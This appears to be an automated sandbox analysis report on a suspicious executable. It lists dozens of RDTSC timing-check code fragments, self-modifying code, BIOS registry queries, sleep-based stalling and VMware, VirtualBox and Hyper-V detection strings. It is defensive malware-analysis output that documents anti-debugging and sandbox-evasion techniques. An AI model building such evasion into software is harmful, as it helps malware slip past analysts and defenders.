Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B33 second address: CD6B43 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B43 second address: CD6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6C8B second address: CD6C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6DF5 second address: CD6E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDAE36 second address: CDAE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF499 second address: CDF49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF49D second address: CDF4A7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF4A7 second address: CDF4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15D0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF5F6 second address: CDF60B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F1F1851F5DCh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF79A second address: CDF79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF79E second address: CDF7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7A2 second address: CDF7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7AA second address: CDF7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F1F1851F5D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7B4 second address: CDF7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7D7 second address: CDF7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F1851F5D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7E1 second address: CDF7EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CECC84 second address: CECC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F1F1851F5D6h 0x0000000c jl 00007F1F1851F5D6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CECDC2 second address: CECDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CECDC6 second address: CECDD0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF294D second address: CF2951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7052 second address: CF7084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F1F1851F5DCh 0x0000000e je 00007F1F1851F5D6h 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F1F1851F5DBh 0x0000001c jmp 00007F1F1851F5DFh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7084 second address: CF708E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1F18DC15C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF708E second address: CF70A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDE2 second address: CFEDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDFB second address: CFEDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC4C second address: CFEC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC52 second address: CFEC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC67 second address: CFEC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC6B second address: CFEC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jc 00007F1F1851F5FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC7C second address: CFEC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01E4C second address: D01E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06E14 second address: D06E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0735E second address: D0736C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0736C second address: D073BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15CFh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F1F18DC15D9h 0x00000013 pop esi 0x00000014 push edi 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a jnp 00007F1F18DC15C6h 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D073BB second address: D073C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D073C0 second address: D073CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1F18DC15C6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D08207 second address: D0820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0820C second address: D0821C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1F18DC15C6h 0x0000000a jno 00007F1F18DC15C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CEC7 second address: D0CECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CECB second address: D0CEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CEDC second address: D0CF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F1F1851F5F2h 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CF05 second address: D0CF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CF0D second address: D0CF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CA57 second address: D0CA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CA5C second address: D0CA69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F1F1851F5D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CBB3 second address: D0CBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F18DC15D5h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1F18DC15D0h 0x00000014 jp 00007F1F18DC15C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CBED second address: D0CC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2742D second address: D2743F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F1F18DC15CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2743F second address: D27447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27447 second address: D2744B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2744B second address: D27451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A0CA second address: D2A0E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F18DC15CEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A0E2 second address: D2A10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F1851F5DEh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A10F second address: D2A115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2C5D9 second address: D2C5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DED4 second address: D3DEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DEE7 second address: D3DEFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1F1851F5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F1F1851F5D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDBB second address: D3CDC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDC1 second address: D3CDC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDC7 second address: D3CDF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D7h 0x00000007 jmp 00007F1F18DC15CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDF4 second address: D3CDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDF9 second address: D3CDFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CDFF second address: D3CE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CF5A second address: D3CF64 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F18DC15C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CF64 second address: D3CF6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CF6A second address: D3CF6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CF6F second address: D3CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F1851F5D6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F1851F5E9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CF95 second address: D3CFC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1F18DC15D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F1F18DC15D1h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3D8D5 second address: D3D8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3D8DE second address: D3D8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3D8E2 second address: D3D8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3D8E6 second address: D3D8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3D8EC second address: D3D8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DA43 second address: D3DA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DA4E second address: D3DA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DA52 second address: D3DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4083B second address: D40873 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F1851F5E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F1851F5E9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4093C second address: D40946 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D43837 second address: D4387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007F1F1851F5D6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F1F1851F5E4h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F1F1851F5E7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4387E second address: D4388A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F18DC15C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539043A second address: 5390468 instructions: 0x00000000 rdtsc 0x00000002 mov ch, F6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov ah, bh 0x0000000b pushfd 0x0000000c jmp 00007F1F1851F5DAh 0x00000011 add ax, F9D8h 0x00000016 jmp 00007F1F1851F5DBh 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60C4C second address: C60C52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60C52 second address: C60C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: AA3A4A instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5752	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5752	Thread sleep time: -76038s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6096	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6096	Thread sleep time: -122061s >= -30000s	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>T
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
